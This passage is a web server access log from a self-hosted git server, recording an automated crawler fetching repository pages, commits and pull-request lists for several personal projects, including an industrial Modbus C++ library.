compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20569] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:46:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:46:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" -[17/Feb/2026:17:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" -[17/Feb/2026:17:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:46:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 990] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43341] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13011] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13011] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12964] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20388] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20357] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20393] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20389] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20390] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13884] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:17:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp?display=source" [Client 74.7.227.38] [Length 12247] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:17:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13108] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 19655] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:17:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 